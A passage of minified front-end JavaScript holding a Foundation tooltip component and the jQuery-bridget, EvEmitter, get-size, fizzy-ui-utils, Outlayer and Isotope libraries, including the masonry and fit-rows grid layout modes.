o()("<div></div>").addClass(t).attr({role:"tooltip","aria-hidden":!0,"data-is-active":!1,"data-is-focus":!1,id:e})}},{key:"_setPosition",value:function(){u(i.prototype.__proto__||Object.getPrototypeOf(i.prototype),"_setPosition",this).call(this,this.$element,this.template)}},{key:"show",value:function(){if("all"!==this.options.showOn&&!a.a.is(this.options.showOn))return!1;this.template.css("visibility","hidden").show(),this._setPosition(),this.template.removeClass("top bottom left right").addClass(this.position),this.template.removeClass("align-top align-bottom align-left align-right align-center").addClass("align-"+this.alignment),this.$element.trigger("closeme.zf.tooltip",this.template.attr("id")),this.template.attr({"data-is-active":!0,"aria-hidden":!1}),this.isActive=!0,this.template.stop().hide().css("visibility","").fadeIn(this.options.fadeInDuration,function(){}),this.$element.trigger("show.zf.tooltip")}},{key:"hide",value:function(){var e=this;this.template.stop().attr({"aria-hidden":!0,"data-is-active":!1}).fadeOut(this.options.fadeOutDuration,function(){e.isActive=!1,e.isClick=!1}),this.$element.trigger("hide.zf.tooltip")}},{key:"_events",value:function(){var t=this,i=(this.template,!1);this.options.disableHover||this.$element.on("mouseenter.zf.tooltip",function(e){t.isActive||(t.timeout=setTimeout(function(){t.show()},t.options.hoverDelay))}).on("mouseleave.zf.tooltip",function(e){clearTimeout(t.timeout),(!i||t.isClick&&!t.options.clickOpen)&&t.hide()}),this.options.clickOpen?this.$element.on("mousedown.zf.tooltip",function(e){e.stopImmediatePropagation(),t.isClick||(t.isClick=!0,!t.options.disableHover&&t.$element.attr("tabindex")||t.isActive||t.show())}):this.$element.on("mousedown.zf.tooltip",function(e){e.stopImmediatePropagation(),t.isClick=!0}),this.options.disableForTouch||this.$element.on("tap.zf.tooltip touchend.zf.tooltip",function(e){t.isActive?t.hide():t.show()}),this.$element.on({"close.zf.trigger":this.hide.bind(this)}),this.$element.on("focus.zf.tooltip",function(e){if(i=!0,t.isClick)return t.options.clickOpen||(i=!1),!1;t.show()}).on("focusout.zf.tooltip",function(e){i=!1,t.isClick=!1,t.hide()}).on("resizeme.zf.trigger",function(){t.isActive&&t._setPosition()})}},{key:"toggle",value:function(){this.isActive?this.hide():this.show()}},{key:"_destroy",value:function(){this.$element.attr("title",this.template.text()).off(".zf.trigger .zf.tooltip").removeClass("has-tip top right left").removeAttr("aria-describedby aria-haspopup data-disable-hover data-resize data-toggle data-tooltip data-yeti-box"),this.template.remove()}}]),i}();d.defaults={disableForTouch:!1,hoverDelay:200,fadeInDuration:150,fadeOutDuration:150,disableHover:!1,templateClasses:"",tooltipClass:"tooltip",triggerClass:"has-tip",showOn:"small",template:"",tipText:"",touchCloseText:"Tap to close.",clickOpen:!0,positionClass:"",position:"auto",alignment:"auto",allowOverlap:!1,allowBottomOverlap:!1,vOffset:0,hOffset:0,tooltipHeight:14,tooltipWidth:12,allowHtml:!1}},function(e,t,i){e.exports=i(19)}]),function(t,i){"function"==typeof define&&define.amd?define("jquery-bridget/jquery-bridget",["jquery"],function(e){return i(t,e)}):"object"==typeof module&&module.exports?module.exports=i(t,require("jquery")):t.jQueryBridget=i(t,t.jQuery)}(window,function(e,t){"use strict";function i(c,o,u){(u=u||t||e.jQuery)&&(o.prototype.option||(o.prototype.option=function(e){u.isPlainObject(e)&&(this.options=u.extend(!0,this.options,e))}),u.fn[c]=function(e){if("string"==typeof e){var t=d.call(arguments,1);return a=t,l="$()."+c+'("'+(s=e)+'")',(i=this).each(function(e,t){var i=u.data(t,c);if(i){var n=i[s];if(n&&"_"!=s.charAt(0)){var o=n.apply(i,a);r=void 0===r?o:r}else h(l+" is not a valid method")}else h(c+" not initialized. Cannot call methods, i.e. "+l)}),void 0!==r?r:i}var i,s,a,r,l,n;return n=e,this.each(function(e,t){var i=u.data(t,c);i?(i.option(n),i._init()):(i=new o(t,n),u.data(t,c,i))}),this},n(u))}function n(e){!e||e&&e.bridget||(e.bridget=i)}var d=Array.prototype.slice,o=e.console,h=void 0===o?function(){}:function(e){o.error(e)};return n(t||e.jQuery),i}),function(e,t){"function"==typeof define&&define.amd?define("ev-emitter/ev-emitter",t):"object"==typeof module&&module.exports?module.exports=t():e.EvEmitter=t()}("undefined"!=typeof window?window:this,function(){function e(){}var t=e.prototype;return t.on=function(e,t){if(e&&t){var i=this._events=this._events||{},n=i[e]=i[e]||[];return-1==n.indexOf(t)&&n.push(t),this}},t.once=function(e,t){if(e&&t){this.on(e,t);var i=this._onceEvents=this._onceEvents||{};return(i[e]=i[e]||{})[t]=!0,this}},t.off=function(e,t){var i=this._events&&this._events[e];if(i&&i.length){var n=i.indexOf(t);return-1!=n&&i.splice(n,1),this}},t.emitEvent=function(e,t){var i=this._events&&this._events[e];if(i&&i.length){var n=0,o=i[n];t=t||[];for(var s=this._onceEvents&&this._onceEvents[e];o;){var a=s&&s[o];a&&(this.off(e,o),delete s[o]),o.apply(this,t),o=i[n+=a?0:1]}return this}},e}),function(e,t){"use strict";"function"==typeof define&&define.amd?define("get-size/get-size",[],function(){return t()}):"object"==typeof module&&module.exports?module.exports=t():e.getSize=t()}(window,function(){"use strict";function v(e){var t=parseFloat(e);return-1==e.indexOf("%")&&!isNaN(t)&&t}function y(e){var t=getComputedStyle(e);return t||i("Style returned "+t+". Are you running this code in a hidden iframe on Firefox? See http://bit.ly/getsizebug1"),t}function w(e){if(function(){if(!C){C=!0;var e=document.createElement("div");e.style.width="200px",e.style.padding="1px 2px 3px 4px",e.style.borderStyle="solid",e.style.borderWidth="1px 2px 3px 4px",e.style.boxSizing="border-box";var t=document.body||document.documentElement;t.appendChild(e);var i=y(e);w.isBoxSizeOuter=b=200==v(i.width),t.removeChild(e)}}(),"string"==typeof e&&(e=document.querySelector(e)),e&&"object"==typeof e&&e.nodeType){var t=y(e);if("none"==t.display)return function(){for(var e={width:0,height:0,innerWidth:0,innerHeight:0,outerWidth:0,outerHeight:0},t=0;t<x;t++)e[_[t]]=0;return e}();var i={};i.width=e.offsetWidth,i.height=e.offsetHeight;for(var n=i.isBorderBox="border-box"==t.boxSizing,o=0;o<x;o++){var s=_[o],a=t[s],r=parseFloat(a);i[s]=isNaN(r)?0:r}var l=i.paddingLeft+i.paddingRight,c=i.paddingTop+i.paddingBottom,u=i.marginLeft+i.marginRight,d=i.marginTop+i.marginBottom,h=i.borderLeftWidth+i.borderRightWidth,p=i.borderTopWidth+i.borderBottomWidth,f=n&&b,m=v(t.width);!1!==m&&(i.width=m+(f?0:l+h));var g=v(t.height);return!1!==g&&(i.height=g+(f?0:c+p)),i.innerWidth=i.width-(l+h),i.innerHeight=i.height-(c+p),i.outerWidth=i.width+u,i.outerHeight=i.height+d,i}}var b,i="undefined"==typeof console?function(){}:function(e){console.error(e)},_=["paddingLeft","paddingRight","paddingTop","paddingBottom","marginLeft","marginRight","marginTop","marginBottom","borderLeftWidth","borderRightWidth","borderTopWidth","borderBottomWidth"],x=_.length,C=!1;return w}),function(e,t){"use strict";"function"==typeof define&&define.amd?define("desandro-matches-selector/matches-selector",t):"object"==typeof module&&module.exports?module.exports=t():e.matchesSelector=t()}(window,function(){"use strict";var i=function(){var e=window.Element.prototype;if(e.matches)return"matches";if(e.matchesSelector)return"matchesSelector";for(var t=["webkit","moz","ms","o"],i=0;i<t.length;i++){var n=t[i]+"MatchesSelector";if(e[n])return n}}();return function(e,t){return e[i](t)}}),function(t,i){"function"==typeof define&&define.amd?define("fizzy-ui-utils/utils",["desandro-matches-selector/matches-selector"],function(e){return i(t,e)}):"object"==typeof module&&module.exports?module.exports=i(t,require("desandro-matches-selector")):t.fizzyUIUtils=i(t,t.matchesSelector)}(window,function(c,s){var u={extend:function(e,t){for(var i in t)e[i]=t[i];return e},modulo:function(e,t){return(e%t+t)%t},makeArray:function(e){var t=[];if(Array.isArray(e))t=e;else if(e&&"object"==typeof e&&"number"==typeof e.length)for(var i=0;i<e.length;i++)t.push(e[i]);else t.push(e);return t},removeFrom:function(e,t){var i=e.indexOf(t);-1!=i&&e.splice(i,1)},getParent:function(e,t){for(;e.parentNode&&e!=document.body;)if(e=e.parentNode,s(e,t))return e},getQueryElement:function(e){return"string"==typeof e?document.querySelector(e):e},handleEvent:function(e){var t="on"+e.type;this[t]&&this[t](e)},filterFindElements:function(e,n){e=u.makeArray(e);var o=[];return e.forEach(function(e){if(e instanceof HTMLElement)if(n){s(e,n)&&o.push(e);for(var t=e.querySelectorAll(n),i=0;i<t.length;i++)o.push(t[i])}else o.push(e)}),o},debounceMethod:function(e,t,n){var o=e.prototype[t],s=t+"Timeout";e.prototype[t]=function(){var e=this[s];e&&clearTimeout(e);var t=arguments,i=this;this[s]=setTimeout(function(){o.apply(i,t),delete i[s]},n||100)}},docReady:function(e){var t=document.readyState;"complete"==t||"interactive"==t?setTimeout(e):document.addEventListener("DOMContentLoaded",e)},toDashed:function(e){return e.replace(/(.)([A-Z])/g,function(e,t,i){return t+"-"+i}).toLowerCase()}},d=c.console;return u.htmlInit=function(r,l){u.docReady(function(){var e=u.toDashed(l),o="data-"+e,t=document.querySelectorAll("["+o+"]"),i=document.querySelectorAll(".js-"+e),n=u.makeArray(t).concat(u.makeArray(i)),s=o+"-options",a=c.jQuery;n.forEach(function(t){var e,i=t.getAttribute(o)||t.getAttribute(s);try{e=i&&JSON.parse(i)}catch(e){return void(d&&d.error("Error parsing "+o+" on "+t.className+": "+e))}var n=new r(t,e);a&&a.data(t,l,n)})})},u}),function(e,t){"function"==typeof define&&define.amd?define("outlayer/item",["ev-emitter/ev-emitter","get-size/get-size"],t):"object"==typeof module&&module.exports?module.exports=t(require("ev-emitter"),require("get-size")):(e.Outlayer={},e.Outlayer.Item=t(e.EvEmitter,e.getSize))}(window,function(e,t){"use strict";function i(e,t){e&&(this.element=e,this.layout=t,this.position={x:0,y:0},this._create())}var n=document.documentElement.style,o="string"==typeof n.transition?"transition":"WebkitTransition",s="string"==typeof n.transform?"transform":"WebkitTransform",a={WebkitTransition:"webkitTransitionEnd",transition:"transitionend"}[o],r={transform:s,transition:o,transitionDuration:o+"Duration",transitionProperty:o+"Property",transitionDelay:o+"Delay"},l=i.prototype=Object.create(e.prototype);l.constructor=i,l._create=function(){this._transn={ingProperties:{},clean:{},onEnd:{}},this.css({position:"absolute"})},l.handleEvent=function(e){var t="on"+e.type;this[t]&&this[t](e)},l.getSize=function(){this.size=t(this.element)},l.css=function(e){var t=this.element.style;for(var i in e){t[r[i]||i]=e[i]}},l.getPosition=function(){var e=getComputedStyle(this.element),t=this.layout._getOption("originLeft"),i=this.layout._getOption("originTop"),n=e[t?"left":"right"],o=e[i?"top":"bottom"],s=this.layout.size,a=-1!=n.indexOf("%")?parseFloat(n)/100*s.width:parseInt(n,10),r=-1!=o.indexOf("%")?parseFloat(o)/100*s.height:parseInt(o,10);a=isNaN(a)?0:a,r=isNaN(r)?0:r,a-=t?s.paddingLeft:s.paddingRight,r-=i?s.paddingTop:s.paddingBottom,this.position.x=a,this.position.y=r},l.layoutPosition=function(){var e=this.layout.size,t={},i=this.layout._getOption("originLeft"),n=this.layout._getOption("originTop"),o=i?"paddingLeft":"paddingRight",s=i?"left":"right",a=i?"right":"left",r=this.position.x+e[o];t[s]=this.getXValue(r),t[a]="";var l=n?"paddingTop":"paddingBottom",c=n?"top":"bottom",u=n?"bottom":"top",d=this.position.y+e[l];t[c]=this.getYValue(d),t[u]="",this.css(t),this.emitEvent("layout",[this])},l.getXValue=function(e){var t=this.layout._getOption("horizontal");return this.layout.options.percentPosition&&!t?e/this.layout.size.width*100+"%":e+"px"},l.getYValue=function(e){var t=this.layout._getOption("horizontal");return this.layout.options.percentPosition&&t?e/this.layout.size.height*100+"%":e+"px"},l._transitionTo=function(e,t){this.getPosition();var i=this.position.x,n=this.position.y,o=parseInt(e,10),s=parseInt(t,10),a=o===this.position.x&&s===this.position.y;if(this.setPosition(e,t),!a||this.isTransitioning){var r=e-i,l=t-n,c={};c.transform=this.getTranslate(r,l),this.transition({to:c,onTransitionEnd:{transform:this.layoutPosition},isCleaning:!0})}else this.layoutPosition()},l.getTranslate=function(e,t){return"translate3d("+(e=this.layout._getOption("originLeft")?e:-e)+"px, "+(t=this.layout._getOption("originTop")?t:-t)+"px, 0)"},l.goTo=function(e,t){this.setPosition(e,t),this.layoutPosition()},l.moveTo=l._transitionTo,l.setPosition=function(e,t){this.position.x=parseInt(e,10),this.position.y=parseInt(t,10)},l._nonTransition=function(e){for(var t in this.css(e.to),e.isCleaning&&this._removeStyles(e.to),e.onTransitionEnd)e.onTransitionEnd[t].call(this)},l.transition=function(e){if(parseFloat(this.layout.options.transitionDuration)){var t=this._transn;for(var i in e.onTransitionEnd)t.onEnd[i]=e.onTransitionEnd[i];for(i in e.to)t.ingProperties[i]=!0,e.isCleaning&&(t.clean[i]=!0);if(e.from){this.css(e.from);this.element.offsetHeight;null}this.enableTransition(e.to),this.css(e.to),this.isTransitioning=!0}else this._nonTransition(e)};var c="opacity,"+s.replace(/([A-Z])/g,function(e){return"-"+e.toLowerCase()});l.enableTransition=function(){if(!this.isTransitioning){var e=this.layout.options.transitionDuration;e="number"==typeof e?e+"ms":e,this.css({transitionProperty:c,transitionDuration:e,transitionDelay:this.staggerDelay||0}),this.element.addEventListener(a,this,!1)}},l.onwebkitTransitionEnd=function(e){this.ontransitionend(e)},l.onotransitionend=function(e){this.ontransitionend(e)};var u={"-webkit-transform":"transform"};l.ontransitionend=function(e){if(e.target===this.element){var t=this._transn,i=u[e.propertyName]||e.propertyName;if(delete t.ingProperties[i],function(e){for(var t in e)return!1;return!0}(t.ingProperties)&&this.disableTransition(),i in t.clean&&(this.element.style[e.propertyName]="",delete t.clean[i]),i in t.onEnd)t.onEnd[i].call(this),delete t.onEnd[i];this.emitEvent("transitionEnd",[this])}},l.disableTransition=function(){this.removeTransitionStyles(),this.element.removeEventListener(a,this,!1),this.isTransitioning=!1},l._removeStyles=function(e){var t={};for(var i in e)t[i]="";this.css(t)};var d={transitionProperty:"",transitionDuration:"",transitionDelay:""};return l.removeTransitionStyles=function(){this.css(d)},l.stagger=function(e){e=isNaN(e)?0:e,this.staggerDelay=e+"ms"},l.removeElem=function(){this.element.parentNode.removeChild(this.element),this.css({display:""}),this.emitEvent("remove",[this])},l.remove=function(){o&&parseFloat(this.layout.options.transitionDuration)?(this.once("transitionEnd",function(){this.removeElem()}),this.hide()):this.removeElem()},l.reveal=function(){delete this.isHidden,this.css({display:""});var e=this.layout.options,t={};t[this.getHideRevealTransitionEndProperty("visibleStyle")]=this.onRevealTransitionEnd,this.transition({from:e.hiddenStyle,to:e.visibleStyle,isCleaning:!0,onTransitionEnd:t})},l.onRevealTransitionEnd=function(){this.isHidden||this.emitEvent("reveal")},l.getHideRevealTransitionEndProperty=function(e){var t=this.layout.options[e];if(t.opacity)return"opacity";for(var i in t)return i},l.hide=function(){this.isHidden=!0,this.css({display:""});var e=this.layout.options,t={};t[this.getHideRevealTransitionEndProperty("hiddenStyle")]=this.onHideTransitionEnd,this.transition({from:e.visibleStyle,to:e.hiddenStyle,isCleaning:!0,onTransitionEnd:t})},l.onHideTransitionEnd=function(){this.isHidden&&(this.css({display:"none"}),this.emitEvent("hide"))},l.destroy=function(){this.css({position:"",left:"",right:"",top:"",bottom:"",transition:"",transform:""})},i}),function(o,s){"use strict";"function"==typeof define&&define.amd?define("outlayer/outlayer",["ev-emitter/ev-emitter","get-size/get-size","fizzy-ui-utils/utils","./item"],function(e,t,i,n){return s(o,e,t,i,n)}):"object"==typeof module&&module.exports?module.exports=s(o,require("ev-emitter"),require("get-size"),require("fizzy-ui-utils"),require("./item")):o.Outlayer=s(o,o.EvEmitter,o.getSize,o.fizzyUIUtils,o.Outlayer.Item)}(window,function(e,t,o,s,n){"use strict";function a(e,t){var i=s.getQueryElement(e);if(i){this.element=i,c&&(this.$element=c(this.element)),this.options=s.extend({},this.constructor.defaults),this.option(t);var n=++u;this.element.outlayerGUID=n,(d[n]=this)._create(),this._getOption("initLayout")&&this.layout()}else l&&l.error("Bad element for "+this.constructor.namespace+": "+(i||e))}function r(e){function t(){e.apply(this,arguments)}return t.prototype=Object.create(e.prototype),t.prototype.constructor=t}var l=e.console,c=e.jQuery,i=function(){},u=0,d={};a.namespace="outlayer",a.Item=n,a.defaults={containerStyle:{position:"relative"},initLayout:!0,originLeft:!0,originTop:!0,resize:!0,resizeContainer:!0,transitionDuration:"0.4s",hiddenStyle:{opacity:0,transform:"scale(0.001)"},visibleStyle:{opacity:1,transform:"scale(1)"}};var h=a.prototype;s.extend(h,t.prototype),h.option=function(e){s.extend(this.options,e)},h._getOption=function(e){var t=this.constructor.compatOptions[e];return t&&void 0!==this.options[t]?this.options[t]:this.options[e]},a.compatOptions={initLayout:"isInitLayout",horizontal:"isHorizontal",layoutInstant:"isLayoutInstant",originLeft:"isOriginLeft",originTop:"isOriginTop",resize:"isResizeBound",resizeContainer:"isResizingContainer"},h._create=function(){this.reloadItems(),this.stamps=[],this.stamp(this.options.stamp),s.extend(this.element.style,this.options.containerStyle),this._getOption("resize")&&this.bindResize()},h.reloadItems=function(){this.items=this._itemize(this.element.children)},h._itemize=function(e){for(var t=this._filterFindItemElements(e),i=this.constructor.Item,n=[],o=0;o<t.length;o++){var s=new i(t[o],this);n.push(s)}return n},h._filterFindItemElements=function(e){return s.filterFindElements(e,this.options.itemSelector)},h.getItemElements=function(){return this.items.map(function(e){return e.element})},h.layout=function(){this._resetLayout(),this._manageStamps();var e=this._getOption("layoutInstant"),t=void 0!==e?e:!this._isLayoutInited;this.layoutItems(this.items,t),this._isLayoutInited=!0},h._init=h.layout,h._resetLayout=function(){this.getSize()},h.getSize=function(){this.size=o(this.element)},h._getMeasurement=function(e,t){var i,n=this.options[e];n?("string"==typeof n?i=this.element.querySelector(n):n instanceof HTMLElement&&(i=n),this[e]=i?o(i)[t]:n):this[e]=0},h.layoutItems=function(e,t){e=this._getItemsForLayout(e),this._layoutItems(e,t),this._postLayout()},h._getItemsForLayout=function(e){return e.filter(function(e){return!e.isIgnored})},h._layoutItems=function(e,i){if(this._emitCompleteOnItems("layout",e),e&&e.length){var n=[];e.forEach(function(e){var t=this._getItemLayoutPosition(e);t.item=e,t.isInstant=i||e.isLayoutInstant,n.push(t)},this),this._processLayoutQueue(n)}},h._getItemLayoutPosition=function(){return{x:0,y:0}},h._processLayoutQueue=function(e){this.updateStagger(),e.forEach(function(e,t){this._positionItem(e.item,e.x,e.y,e.isInstant,t)},this)},h.updateStagger=function(){var e=this.options.stagger;if(null!=e)return this.stagger=function(e){if("number"==typeof e)return e;var t=e.match(/(^\d*\.?\d*)(\w*)/),i=t&&t[1],n=t&&t[2];return i.length?(i=parseFloat(i))*(p[n]||1):0}(e),this.stagger;this.stagger=0},h._positionItem=function(e,t,i,n,o){n?e.goTo(t,i):(e.stagger(o*this.stagger),e.moveTo(t,i))},h._postLayout=function(){this.resizeContainer()},h.resizeContainer=function(){if(this._getOption("resizeContainer")){var e=this._getContainerSize();e&&(this._setContainerMeasure(e.width,!0),this._setContainerMeasure(e.height,!1))}},h._getContainerSize=i,h._setContainerMeasure=function(e,t){if(void 0!==e){var i=this.size;i.isBorderBox&&(e+=t?i.paddingLeft+i.paddingRight+i.borderLeftWidth+i.borderRightWidth:i.paddingBottom+i.paddingTop+i.borderTopWidth+i.borderBottomWidth),e=Math.max(e,0),this.element.style[t?"width":"height"]=e+"px"}},h._emitCompleteOnItems=function(t,e){function i(){o.dispatchEvent(t+"Complete",null,[e])}function n(){++a==s&&i()}var o=this,s=e.length;if(e&&s){var a=0;e.forEach(function(e){e.once(t,n)})}else i()},h.dispatchEvent=function(e,t,i){var n=t?[t].concat(i):i;if(this.emitEvent(e,n),c)if(this.$element=this.$element||c(this.element),t){var o=c.Event(t);o.type=e,this.$element.trigger(o,i)}else this.$element.trigger(e,i)},h.ignore=function(e){var t=this.getItem(e);t&&(t.isIgnored=!0)},h.unignore=function(e){var t=this.getItem(e);t&&delete t.isIgnored},h.stamp=function(e){(e=this._find(e))&&(this.stamps=this.stamps.concat(e),e.forEach(this.ignore,this))},h.unstamp=function(e){(e=this._find(e))&&e.forEach(function(e){s.removeFrom(this.stamps,e),this.unignore(e)},this)},h._find=function(e){if(e)return"string"==typeof e&&(e=this.element.querySelectorAll(e)),e=s.makeArray(e)},h._manageStamps=function(){this.stamps&&this.stamps.length&&(this._getBoundingRect(),this.stamps.forEach(this._manageStamp,this))},h._getBoundingRect=function(){var e=this.element.getBoundingClientRect(),t=this.size;this._boundingRect={left:e.left+t.paddingLeft+t.borderLeftWidth,top:e.top+t.paddingTop+t.borderTopWidth,right:e.right-(t.paddingRight+t.borderRightWidth),bottom:e.bottom-(t.paddingBottom+t.borderBottomWidth)}},h._manageStamp=i,h._getElementOffset=function(e){var t=e.getBoundingClientRect(),i=this._boundingRect,n=o(e);return{left:t.left-i.left-n.marginLeft,top:t.top-i.top-n.marginTop,right:i.right-t.right-n.marginRight,bottom:i.bottom-t.bottom-n.marginBottom}},h.handleEvent=s.handleEvent,h.bindResize=function(){e.addEventListener("resize",this),this.isResizeBound=!0},h.unbindResize=function(){e.removeEventListener("resize",this),this.isResizeBound=!1},h.onresize=function(){this.resize()},s.debounceMethod(a,"onresize",100),h.resize=function(){this.isResizeBound&&this.needsResizeLayout()&&this.layout()},h.needsResizeLayout=function(){var e=o(this.element);return this.size&&e&&e.innerWidth!==this.size.innerWidth},h.addItems=function(e){var t=this._itemize(e);return t.length&&(this.items=this.items.concat(t)),t},h.appended=function(e){var t=this.addItems(e);t.length&&(this.layoutItems(t,!0),this.reveal(t))},h.prepended=function(e){var t=this._itemize(e);if(t.length){var i=this.items.slice(0);this.items=t.concat(i),this._resetLayout(),this._manageStamps(),this.layoutItems(t,!0),this.reveal(t),this.layoutItems(i)}},h.reveal=function(e){if(this._emitCompleteOnItems("reveal",e),e&&e.length){var i=this.updateStagger();e.forEach(function(e,t){e.stagger(t*i),e.reveal()})}},h.hide=function(e){if(this._emitCompleteOnItems("hide",e),e&&e.length){var i=this.updateStagger();e.forEach(function(e,t){e.stagger(t*i),e.hide()})}},h.revealItemElements=function(e){var t=this.getItems(e);this.reveal(t)},h.hideItemElements=function(e){var t=this.getItems(e);this.hide(t)},h.getItem=function(e){for(var t=0;t<this.items.length;t++){var i=this.items[t];if(i.element==e)return i}},h.getItems=function(e){e=s.makeArray(e);var i=[];return e.forEach(function(e){var t=this.getItem(e);t&&i.push(t)},this),i},h.remove=function(e){var t=this.getItems(e);this._emitCompleteOnItems("remove",t),t&&t.length&&t.forEach(function(e){e.remove(),s.removeFrom(this.items,e)},this)},h.destroy=function(){var e=this.element.style;e.height="",e.position="",e.width="",this.items.forEach(function(e){e.destroy()}),this.unbindResize();var t=this.element.outlayerGUID;delete d[t],delete this.element.outlayerGUID,c&&c.removeData(this.element,this.constructor.namespace)},a.data=function(e){var t=(e=s.getQueryElement(e))&&e.outlayerGUID;return t&&d[t]},a.create=function(e,t){var i=r(a);return i.defaults=s.extend({},a.defaults),s.extend(i.defaults,t),i.compatOptions=s.extend({},a.compatOptions),i.namespace=e,i.data=a.data,i.Item=r(n),s.htmlInit(i,e),c&&c.bridget&&c.bridget(e,i),i};var p={ms:1,s:1e3};return a.Item=n,a}),function(e,t){"function"==typeof define&&define.amd?define("isotope/js/item",["outlayer/outlayer"],t):"object"==typeof module&&module.exports?module.exports=t(require("outlayer")):(e.Isotope=e.Isotope||{},e.Isotope.Item=t(e.Outlayer))}(window,function(e){"use strict";function t(){e.Item.apply(this,arguments)}var i=t.prototype=Object.create(e.Item.prototype),n=i._create;i._create=function(){this.id=this.layout.itemGUID++,n.call(this),this.sortData={}},i.updateSortData=function(){if(!this.isIgnored){this.sortData.id=this.id,this.sortData["original-order"]=this.id,this.sortData.random=Math.random();var e=this.layout.options.getSortData,t=this.layout._sorters;for(var i in e){var n=t[i];this.sortData[i]=n(this.element,this)}}};var o=i.destroy;return i.destroy=function(){o.apply(this,arguments),this.css({display:""})},t}),function(e,t){"function"==typeof define&&define.amd?define("isotope/js/layout-mode",["get-size/get-size","outlayer/outlayer"],t):"object"==typeof module&&module.exports?module.exports=t(require("get-size"),require("outlayer")):(e.Isotope=e.Isotope||{},e.Isotope.LayoutMode=t(e.getSize,e.Outlayer))}(window,function(t,i){"use strict";function n(e){(this.isotope=e)&&(this.options=e.options[this.namespace],this.element=e.element,this.items=e.filteredItems,this.size=e.size)}var o=n.prototype;return["_resetLayout","_getItemLayoutPosition","_manageStamp","_getContainerSize","_getElementOffset","needsResizeLayout","_getOption"].forEach(function(e){o[e]=function(){return i.prototype[e].apply(this.isotope,arguments)}}),o.needsVerticalResizeLayout=function(){var e=t(this.isotope.element);return this.isotope.size&&e&&e.innerHeight!=this.isotope.size.innerHeight},o._getMeasurement=function(){this.isotope._getMeasurement.apply(this,arguments)},o.getColumnWidth=function(){this.getSegmentSize("column","Width")},o.getRowHeight=function(){this.getSegmentSize("row","Height")},o.getSegmentSize=function(e,t){var i=e+t,n="outer"+t;if(this._getMeasurement(i,n),!this[i]){var o=this.getFirstItemSize();this[i]=o&&o[n]||this.isotope.size["inner"+t]}},o.getFirstItemSize=function(){var e=this.isotope.filteredItems[0];return e&&e.element&&t(e.element)},o.layout=function(){this.isotope.layout.apply(this.isotope,arguments)},o.getSize=function(){this.isotope.getSize(),this.size=this.isotope.size},n.modes={},n.create=function(e,t){function i(){n.apply(this,arguments)}return i.prototype=Object.create(o),i.prototype.constructor=i,t&&(i.options=t),i.prototype.namespace=e,n.modes[e]=i},n}),function(e,t){"function"==typeof define&&define.amd?define("masonry/masonry",["outlayer/outlayer","get-size/get-size"],t):"object"==typeof module&&module.exports?module.exports=t(require("outlayer"),require("get-size")):e.Masonry=t(e.Outlayer,e.getSize)}(window,function(e,c){var t=e.create("masonry");t.compatOptions.fitWidth="isFitWidth";var i=t.prototype;return i._resetLayout=function(){this.getSize(),this._getMeasurement("columnWidth","outerWidth"),this._getMeasurement("gutter","outerWidth"),this.measureColumns(),this.colYs=[];for(var e=0;e<this.cols;e++)this.colYs.push(0);this.maxY=0,this.horizontalColIndex=0},i.measureColumns=function(){if(this.getContainerWidth(),!this.columnWidth){var e=this.items[0],t=e&&e.element;this.columnWidth=t&&c(t).outerWidth||this.containerWidth}var i=this.columnWidth+=this.gutter,n=this.containerWidth+this.gutter,o=n/i,s=i-n%i;o=Math[s&&s<1?"round":"floor"](o),this.cols=Math.max(o,1)},i.getContainerWidth=function(){var e=this._getOption("fitWidth")?this.element.parentNode:this.element,t=c(e);this.containerWidth=t&&t.innerWidth},i._getItemLayoutPosition=function(e){e.getSize();var t=e.size.outerWidth%this.columnWidth,i=Math[t&&t<1?"round":"ceil"](e.size.outerWidth/this.columnWidth);i=Math.min(i,this.cols);for(var n=this[this.options.horizontalOrder?"_getHorizontalColPosition":"_getTopColPosition"](i,e),o={x:this.columnWidth*n.col,y:n.y},s=n.y+e.size.outerHeight,a=i+n.col,r=n.col;r<a;r++)this.colYs[r]=s;return o},i._getTopColPosition=function(e){var t=this._getTopColGroup(e),i=Math.min.apply(Math,t);return{col:t.indexOf(i),y:i}},i._getTopColGroup=function(e){if(e<2)return this.colYs;for(var t=[],i=this.cols+1-e,n=0;n<i;n++)t[n]=this._getColGroupY(n,e);return t},i._getColGroupY=function(e,t){if(t<2)return this.colYs[e];var i=this.colYs.slice(e,e+t);return Math.max.apply(Math,i)},i._getHorizontalColPosition=function(e,t){var i=this.horizontalColIndex%this.cols;i=1<e&&i+e>this.cols?0:i;var n=t.size.outerWidth&&t.size.outerHeight;return this.horizontalColIndex=n?i+e:this.horizontalColIndex,{col:i,y:this._getColGroupY(i,e)}},i._manageStamp=function(e){var t=c(e),i=this._getElementOffset(e),n=this._getOption("originLeft")?i.left:i.right,o=n+t.outerWidth,s=Math.floor(n/this.columnWidth);s=Math.max(0,s);var a=Math.floor(o/this.columnWidth);a-=o%this.columnWidth?0:1,a=Math.min(this.cols-1,a);for(var r=(this._getOption("originTop")?i.top:i.bottom)+t.outerHeight,l=s;l<=a;l++)this.colYs[l]=Math.max(r,this.colYs[l])},i._getContainerSize=function(){this.maxY=Math.max.apply(Math,this.colYs);var e={height:this.maxY};return this._getOption("fitWidth")&&(e.width=this._getContainerFitWidth()),e},i._getContainerFitWidth=function(){for(var e=0,t=this.cols;--t&&0===this.colYs[t];)e++;return(this.cols-e)*this.columnWidth-this.gutter},i.needsResizeLayout=function(){var e=this.containerWidth;return this.getContainerWidth(),e!=this.containerWidth},t}),function(e,t){"function"==typeof define&&define.amd?define("isotope/js/layout-modes/masonry",["../layout-mode","masonry/masonry"],t):"object"==typeof module&&module.exports?module.exports=t(require("../layout-mode"),require("masonry-layout")):t(e.Isotope.LayoutMode,e.Masonry)}(window,function(e,t){"use strict";var i=e.create("masonry"),n=i.prototype,o={_getElementOffset:!0,layout:!0,_getMeasurement:!0};for(var s in t.prototype)o[s]||(n[s]=t.prototype[s]);var a=n.measureColumns;n.measureColumns=function(){this.items=this.isotope.filteredItems,a.call(this)};var r=n._getOption;return n._getOption=function(e){return"fitWidth"==e?void 0!==this.options.isFitWidth?this.options.isFitWidth:this.options.fitWidth:r.apply(this.isotope,arguments)},i}),function(e,t){"function"==typeof define&&define.amd?define("isotope/js/layout-modes/fit-rows",["../layout-mode"],t):"object"==typeof exports?module.exports=t(require("../layout-mode")):t(e.Isotope.LayoutMode)}(window,function(e){"use strict";var t=e.create("fitRows"),i=t.prototype;return i._resetLayout=function(){this.x=0,this.y=0,this.maxY=0,this._getMeasurement("gutter","outerWidth")},i._getItemLayoutPosition=function(e){e.getSize();var t=e.size.outerWidth+this.gutter,i=this.isotope.size.innerWidth+this.gutter;0!==this.x&&t+this.x>i&&(this.x=0,this.y=this.maxY);var n={x:this.x,y:this.y};return 